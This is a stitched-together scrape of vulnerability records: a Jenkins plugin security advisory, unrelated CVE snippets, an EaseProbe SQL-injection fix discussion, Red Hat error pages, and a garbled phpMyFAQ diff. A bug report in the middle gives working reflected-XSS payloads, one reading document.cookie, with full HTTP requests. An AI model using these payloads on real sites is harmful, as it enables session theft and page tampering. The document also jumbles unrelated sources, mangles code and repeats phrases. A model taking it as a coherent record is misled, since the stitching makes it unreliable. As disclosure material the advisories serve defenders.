Jenkins Scriptler Plugin 3.3 and earlier does not escape the name of scripts on the UI when asking to confirm their deletion, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by exploitable by attackers able to create Scriptler scripts.

This advisory announces vulnerabilities in the following Jenkins deliverables:

*   Active Choices Plugin
*   OWASP Dependency-Check Plugin
*   Performance Plugin
*   pom2config Plugin
*   Scriptler Plugin
*   Squash TM Publisher (Squash4Jenkins) Plugin

**Descriptions****Stored XSS vulnerability in Active Choices Plugin**

**SECURITY-2219 / CVE-2021-21699**  
**Severity (CVSS):** High  
**Affected plugin: uno-choice**  
**Description:**

Active Choices Plugin 2.5.6 and earlier does not escape the parameter name of reactive parameters and dynamic reference parameters.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Job/Configure permission.

Active Choices Plugin 2.5.7 escapes references to parameter names.

**Stored XSS vulnerability in Scriptler Plugin**

**SECURITY-2406 / CVE-2021-21700**  
**Severity (CVSS):** High  
**Affected plugin: scriptler**  
**Description:**

Scriptler Plugin 3.3 and earlier does not escape the name of scripts on the UI when asking to confirm their deletion.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to create Scriptler scripts.

Scriptler Plugin 3.4 escapes the name of scripts on the UI when asking to confirm their deletion.

**XXE vulnerability in Performance Plugin**

**SECURITY-2394 / CVE-2021-21701**  
**Severity (CVSS):** High  
**Affected plugin: performance**  
**Description:**

Performance Plugin 3.20 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.

This allows attackers able to control workspace contents to have Jenkins parse a crafted XML report file that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery.

As of publication of this advisory, there is no fix.

**XXE vulnerability in pom2config Plugin**

**SECURITY-2415 / CVE-2021-43576**  
**Severity (CVSS):** High  
**Affected plugin: pom2config**  
**Description:**

pom2config Plugin 1.2 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.

This allows attackers with Overall/Read and Item/Read permissions to have Jenkins parse a crafted XML file that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery.

As of publication of this advisory, there is no fix.

**XXE vulnerability in OWASP Dependency-Check Plugin**

**SECURITY-2488 / CVE-2021-43577**  
**Severity (CVSS):** High  
**Affected plugin: dependency-check-jenkins-plugin**  
**Description:**

OWASP Dependency-Check Plugin 5.1.1 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.

This allows attackers able to control workspace contents to have Jenkins parse a crafted XML file that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery.

As of publication of this advisory, there is no fix.

**Agent-to-controller security bypass in Squash TM Publisher (Squash4Jenkins) Plugin allows writing arbitrary files**

**SECURITY-2525 / CVE-2021-43578**  
**Severity (CVSS):** High  
**Affected plugin: squashtm-publisher**  
**Description:**

Squash TM Publisher (Squash4Jenkins) Plugin 1.0.0 and earlier implements an agent-to-controller message that does not implement any validation of its input.

This allows attackers able to control agent processes to replace arbitrary files on the Jenkins controller file system with an attacker-controlled JSON string.

As of publication of this advisory, there is no fix.

**Severity**

*   SECURITY-2219: High
*   SECURITY-2394: High
*   SECURITY-2406: High
*   SECURITY-2415: High
*   SECURITY-2488: High
*   SECURITY-2525: High

**Affected Versions**

*   **Active Choices Plugin** up to and including 2.5.6
*   **OWASP Dependency-Check Plugin** up to and including 5.1.1
*   **Performance Plugin** up to and including 3.20
*   **pom2config Plugin** up to and including 1.2
*   **Scriptler Plugin** up to and including 3.3
*   **Squash TM Publisher (Squash4Jenkins) Plugin** up to and including 1.0.0

**Fix**

*   **Active Choices Plugin** should be updated to version 2.5.7
*   **Scriptler Plugin** should be updated to version 3.4

These versions include fixes to the vulnerabilities described above. All prior versions are considered to be affected by these vulnerabilities unless otherwise indicated.

As of publication of this advisory, no fixes are available for the following plugins:

*   OWASP Dependency-Check Plugin
*   Performance Plugin
*   pom2config Plugin
*   Squash TM Publisher (Squash4Jenkins) Plugin

Learn why we announce these issues.

**Credit**

The Jenkins project would like to thank the reporters for discovering and reporting these vulnerabilities:

*   **Adith Sudhakar working with Trend Micro Zero Day Initiative** for SECURITY-2394, SECURITY-2415
*   **Daniel Beck, CloudBees, Inc.** for SECURITY-2525
*   **Guy Lederfein of Trend Micro** for SECURITY-2406
*   **Kevin Guerroudj, and, independently, Audrey Prieur of Trend Micro** for SECURITY-2219
*   **haby0 (Duxiaoman Financial Security Team)** for SECURITY-2488

CVE-2021-21700: Jenkins Security Advisory 2021-11-12

Jenkins Squash TM Publisher (Squash4Jenkins) Plugin 1.0.0 and earlier implements an agent-to-controller message that does not implement any validation of its input, allowing attackers able to control agent processes to replace arbitrary files on the Jenkins controller file system with an attacker-controlled JSON string.

CVE-2021-43578: Jenkins Security Advisory 2021-11-12

Jenkins pom2config Plugin 1.2 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks, allowing attackers with Overall/Read and Item/Read permissions to have Jenkins parse a crafted XML file that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery.

CVE-2021-43576: Jenkins Security Advisory 2021-11-12

Jenkins Performance Plugin 3.20 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.

CVE-2021-21701: Jenkins Security Advisory 2021-11-12

A vulnerability classified as problematic was found in SourceCodester Phone Shop Sales Managements System 1.0. This vulnerability affects unknown code of the file /osms/assets/plugins/jquery-validation-1.11.1/demo/captcha/index.php of the component CAPTCHA Handler. The manipulation leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-222598 is the identifier assigned to this vulnerability.

Permalink

Cannot retrieve contributors at this time

**Phone Shop Sales Managements System v1.0 has Cross-site scripting (reflected)**

BUG\_Author: Blair

Source code website address：https://www.sourcecodester.com/php/10882/phone-shop-sales-managements-system.html

Vulnerability File: /osms/assets/plugins/jquery-validation-1.11.1/demo/captcha/index.php

Payload1:http://localhost/osms/assets/plugins/jquery-validation-1.11.1/demo/captcha/index.php/"><script>alert(1111)</script>?captcha=1&submit=Check

    GET /osms/assets/plugins/jquery-validation-1.11.1/demo/captcha/index.php/%22%3E%3Cscript%3Ealert(1111)%3C/script%3E?captcha=1&submit=Check HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Cookie: PHPSESSID=6fcav63hl60icb4n7tsvv0ns5k
    Connection: close
    

Payload2:http://localhost/osms/assets/plugins/jquery-validation-1.11.1/demo/captcha/index.php/"><script>alert(document.cookie)</script>?captcha=1&submit=Check

    GET /osms/assets/plugins/jquery-validation-1.11.1/demo/captcha/index.php/%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E?captcha=1&submit=Check HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Connection: close

CVE-2023-1275: bug_report/XSS-1.md at main · blairting/bug_report

EaseProbe is a tool that can do health/status checking. An SQL injection issue was discovered in EaseProbe before 2.1.0 when using MySQL/PostgreSQL data checking. This problem has been fixed in v2.1.0.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

**Conversation**

The MySQL/PostgreSQL data checking could have the SQL injection problem, this PR tries to fix it by adding the quotes in SQL and escaping the quotes in configuration.

func EscapeQuote(str string) string {

type Escape struct {

From string

To string

}

escape := \[\]Escape{

{From: "\`", To: ""}, // remove the backtick

{From: \`\\\`, To: \`\\\\\`},

{From: \`'\`, To: \`\\'\`},

{From: \`"\`, To: \`\\"\`},

}

  

for \_, e := range escape {

str = strings.ReplaceAll(str, e.From, e.To)

}

return str

}

**Choose a reason for hiding this comment**

The reason will be displayed to describe this comment to others. Learn more.

as a cornor case, abc\'def will be escaped to abc\\\'def, is this a correct result?

Copy link

Contributor Author

**Choose a reason for hiding this comment**

The reason will be displayed to describe this comment to others. Learn more.

It's correct. The sql injection always needs a quote to close the previous statement. So escape the quote is key work to prevent injection.

 haoel added this pull request to the merge queue

Apr 25, 2023

Hi @haoel, great to see the issue is addressed. Could you open a Github security advisory for the SQL injection vulnerability we found?

@oxeye-daniel , thanks for the reminder, we have open a github security advisory at: GHSA-4c32-w6c7-77x4

please help review and let us know if anything is incorrect, as this is the first time we open such an advisory, thanks.

Hi @localvar thanks a lot! No problem, you can go ahead and add me as editor for the advisory so I can suggest changes

Reviewers

 localvar localvar approved these changes

 samanhappy samanhappy approved these changes

CVE-2023-33967: Fix the SQL Injection by haoel · Pull Request #330 · megaease/easeprobe

When binding against a DN during authentication, the reply from 389-ds-base will be different whether the DN exists or not. This can be used by an unauthenticated attacker to check the existence of an entry in the LDAP database.

'1905565?cve=title' is not a valid bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2020-35518: Invalid Bug ID

It was discovered that the /configuration view of redhat-certification 7 does not perform an authorization check and it allows an unauthenticated user to remove a "system" file, that is an xml file with host related information, not belonging to him.

'1593632?cve=title' is not a valid bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2018-10866: Invalid Bug ID

A missing permission check in Jenkins SCM HttpClient Plugin 1.5 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified HTTP server using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

**Jenkins SCM HttpClient Plugin Missing Authorization**

Moderate severity GitHub Reviewed Published Sep 22, 2022 • Updated Sep 23, 2022

GHSA-q9j5-2mjx-8x28: Jenkins SCM HttpClient Plugin Missing Authorization

Unrestricted Upload of File with Dangerous Type in GitHub repository thorsten/phpmyfaq prior to 3.1.8.

Expand Up @@ -129,6 +129,19 @@ private function getFileExtension(string $mimeType): string return $mapping\[$mimeType\] ?? ''; }  
/\*\* \* Checks for valid image MIME types, returns true if valid \* @param string $file \* @return bool \*/ private function isValidMimeType(string $file): bool { $types = \['image/jpeg','image/gif','image/png'\]; $type = mime\_content\_type($file);  
return in\_array($type, $types); }  
/\*\* \* Uploads the current file and moves it into the images/ folder. \* Expand All @@ -140,14 +153,19 @@ public function upload(): bool $this\->isUpload && is\_uploaded\_file($this\->uploadedFile\['tmp\_name'\]) && $this\->uploadedFile\['size'\] < $this\->config\->get('records.maxAttachmentSize') ) { if (false === getimagesize($this\->uploadedFile\['tmp\_name'\])) { if (!getimagesize($this\->uploadedFile\['tmp\_name'\])) { return false; }  
if (!$this\->isValidMimeType($this\->uploadedFile\['tmp\_name'\])) { return false; } if (move\_uploaded\_file($this\->uploadedFile\['tmp\_name'\], self::UPLOAD\_DIR . $this\->fileName)) { return true; } else {  
if (!move\_uploaded\_file($this\->uploadedFile\['tmp\_name'\], self::UPLOAD\_DIR . $this\->fileName)) { return false; }  
return true; } else { return false; } Expand Down

Search

lenovo warranty check/lookup | check warranty status | lenovo support us